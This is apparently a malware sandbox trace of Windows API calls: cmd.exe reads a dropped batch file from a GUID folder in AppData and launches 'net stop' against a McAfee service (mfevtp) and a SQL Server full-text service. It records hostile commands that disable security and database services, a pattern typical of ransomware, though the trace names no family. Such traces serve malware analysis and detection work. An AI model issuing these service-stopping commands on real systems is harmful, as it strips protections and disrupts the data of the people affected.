RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0215.555] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0215.555] GetProcessHeap () returned 0x3e0000 [0215.555] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0215.555] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.555] GetProcessHeap () returned 0x3e0000 [0215.555] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0215.556] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0215.556] GetProcessHeap () returned 0x3e0000 [0215.556] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0215.556] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.557] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0215.557] GetLastError () returned 0x2 [0215.557] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0215.557] GetLastError () returned 0x2 [0215.558] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.558] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0215.558] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0215.559] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0215.559] GetLastError () returned 0x2 [0215.559] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0215.559] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0215.560] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.560] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0215.560] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0215.560] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0215.560] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0215.560] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop mfevtp /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop mfevtp /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop mfevtp /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xaf4, dwThreadId=0x640)) returned 1 [0215.564] CloseHandle (hObject=0x74) returned 1 [0215.565] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0215.565] GetProcessHeap () returned 0x3e0000 [0215.565] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0215.565] GetEnvironmentStringsW () returned 0x3f8408* [0215.565] GetProcessHeap () returned 0x3e0000 [0215.565] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0215.565] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0215.565] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0215.691] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0215.691] CloseHandle (hObject=0x78) returned 1 [0215.691] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0215.691] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0215.691] GetProcessHeap () returned 0x3e0000 [0215.691] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0215.691] GetEnvironmentStringsW () returned 0x3f8408* [0215.691] GetProcessHeap () returned 0x3e0000 [0215.691] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0215.691] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0215.691] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0215.691] GetProcessHeap () returned 0x3e0000 [0215.691] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0215.691] GetEnvironmentStringsW () returned 0x3f8408* [0215.691] GetProcessHeap () returned 0x3e0000 [0215.692] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0215.692] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0215.692] GetProcessHeap () returned 0x3e0000 [0215.692] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0215.692] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0215.692] _get_osfhandle (_FileHandle=1) returned 0x264 [0215.692] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0215.692] _get_osfhandle (_FileHandle=1) returned 0x264 [0215.692] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0215.692] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0215.692] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0215.692] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0215.692] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0215.693] SetConsoleInputExeNameW () returned 0x1 [0215.693] GetConsoleOutputCP () returned 0x1b5 [0215.693] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0215.693] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.693] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0215.693] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0215.693] _get_osfhandle (_FileHandle=3) returned 0x78 [0215.693] SetFilePointer (in: hFile=0x78, lDistanceToMove=5660, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x161c [0215.693] GetProcessHeap () returned 0x3e0000 [0215.693] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0215.693] GetProcessHeap () returned 0x3e0000 [0215.693] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0215.693] GetProcessHeap () returned 0x3e0000 [0215.693] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0215.693] GetProcessHeap () returned 0x3e0000 [0215.693] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0215.694] GetProcessHeap () returned 0x3e0000 [0215.694] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0215.694] GetProcessHeap () returned 0x3e0000 [0215.694] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0215.694] GetProcessHeap () returned 0x3e0000 [0215.694] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0215.694] GetProcessHeap () returned 0x3e0000 [0215.694] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0215.694] GetProcessHeap () returned 0x3e0000 [0215.694] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0215.694] GetProcessHeap () returned 0x3e0000 [0215.694] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0215.694] GetProcessHeap () returned 0x3e0000 [0215.694] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0215.694] GetProcessHeap () returned 0x3e0000 [0215.694] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0215.694] GetProcessHeap () returned 0x3e0000 [0215.694] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0215.694] _get_osfhandle (_FileHandle=3) returned 0x78 [0215.694] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x161c [0215.694] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x2a5, lpOverlapped=0x0) returned 1 [0215.694] SetFilePointer (in: hFile=0x78, lDistanceToMove=5687, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1637 [0215.694] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=27, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop msftesql$PROD /y\r\ny\r\n\n/y\r\n/y\r\n¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 27 [0215.695] _get_osfhandle (_FileHandle=3) returned 0x78 [0215.695] GetFileType (hFile=0x78) returned 0x1 [0215.695] _get_osfhandle (_FileHandle=3) returned 0x78 [0215.695] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1637 [0215.695] GetProcessHeap () returned 0x3e0000 [0215.695] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0215.695] GetProcessHeap () returned 0x3e0000 [0215.695] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0215.698] _tell (_FileHandle=3) returned 5687 [0215.698] _close (_FileHandle=3) returned 0 [0215.698] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0215.698] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0215.698] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0215.698] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0215.698] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0215.698] _wcsicmp (_String1="net", _String2="CD") returned 11 [0215.699] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0215.699] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0215.699] _wcsicmp (_String1="net", _String2="REN") returned -4 [0215.699] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0215.699] _wcsicmp (_String1="net", _String2="SET") returned -5 [0215.699] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0215.699] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0215.699] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0215.699] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0215.699] _wcsicmp (_String1="net", _String2="MD") returned 1 [0215.699] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0215.699] _wcsicmp (_String1="net", _String2="RD") returned -4 [0215.699] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0215.699] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0215.699] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0215.699] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0215.699] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0215.699] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0215.699] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0215.699] _wcsicmp (_String1="net", _String2="VER") returned -8 [0215.699] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0215.699] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0215.699] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0215.699] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0215.699] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0215.699] _wcsicmp (_String1="net", _String2="START") returned -5 [0215.699] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0215.699] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0215.699] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0215.699] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0215.699] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0215.699] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0215.699] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0215.699] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0215.699] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0215.699] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0215.700] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0215.700] SetErrorMode (uMode=0x0) returned 0x1 [0215.700] GetProcessHeap () returned 0x3e0000 [0215.700] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0215.700] GetProcessHeap () returned 0x3e0000 [0215.700] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0215.700] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0215.700] GetProcessHeap () returned 0x3e0000 [0215.700] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0215.701] GetProcessHeap () returned 0x3e0000 [0215.701] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0215.701] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0215.701] GetProcessHeap () returned 0x3e0000 [0215.701] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0215.701] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.701] GetProcessHeap () returned 0x3e0000 [0215.701] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0215.701] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0215.701] GetProcessHeap () returned 0x3e0000 [0215.701] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0215.702] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.702] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0215.702] GetLastError () returned 0x2 [0215.703] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0215.703] GetLastError () returned 0x2 [0215.703] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.704] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0215.704] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0215.704] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0215.705] GetLastError () returned 0x2 [0215.705] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0215.705] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0215.705] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.706] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0215.706] SetErrorMode (uMode=0x0) returned 0x1 [0215.706] GetProcessHeap () returned 0x3e0000 [0215.706] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0215.706] GetProcessHeap () returned 0x3e0000 [0215.706] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0215.706] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0215.706] GetProcessHeap () returned 0x3e0000 [0215.706] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0215.707] GetProcessHeap () returned 0x3e0000 [0215.707] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0215.707] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0215.707] GetProcessHeap () returned 0x3e0000 [0215.707] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0215.707] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.707] GetProcessHeap () returned 0x3e0000 [0215.707] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0215.707] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0215.707] GetProcessHeap () returned 0x3e0000 [0215.707] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0215.708] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.708] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0215.708] GetLastError () returned 0x2 [0215.709] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0215.709] GetLastError () returned 0x2 [0215.709] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.710] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0215.710] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0215.710] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0215.710] GetLastError () returned 0x2 [0215.711] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0215.711] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0215.711] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.711] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0215.711] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0215.712] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0215.712] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0215.712] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop msftesql$PROD /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop msftesql$PROD /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop msftesql$PROD /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x6ac, dwThreadId=0x410)) returned 1 [0215.716] CloseHandle (hObject=0x78) returned 1 [0215.716] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0215.716] GetProcessHeap () returned 0x3e0000 [0215.716] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0215.716] GetEnvironmentStringsW () returned 0x3f8408* [0215.716] GetProcessHeap () returned 0x3e0000 [0215.716] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0215.716] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0215.716] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0215.859] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0215.859] CloseHandle (hObject=0x74) returned 1 [0215.859] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0215.859] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0215.859] GetProcessHeap () returned 0x3e0000 [0215.859] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0215.859] GetEnvironmentStringsW () returned 0x3f8408* [0215.859] GetProcessHeap () returned 0x3e0000 [0215.859] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0215.860] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0215.860] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0215.860] GetProcessHeap () returned 0x3e0000 [0215.860] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0215.860] GetEnvironmentStringsW () returned 0x3f8408* [0215.860] GetProcessHeap () returned 0x3e0000 [0215.860] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0215.860] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0215.860] GetProcessHeap () returned 0x3e0000 [0215.860] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0215.860] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0215.860] _get_osfhandle (_FileHandle=1) 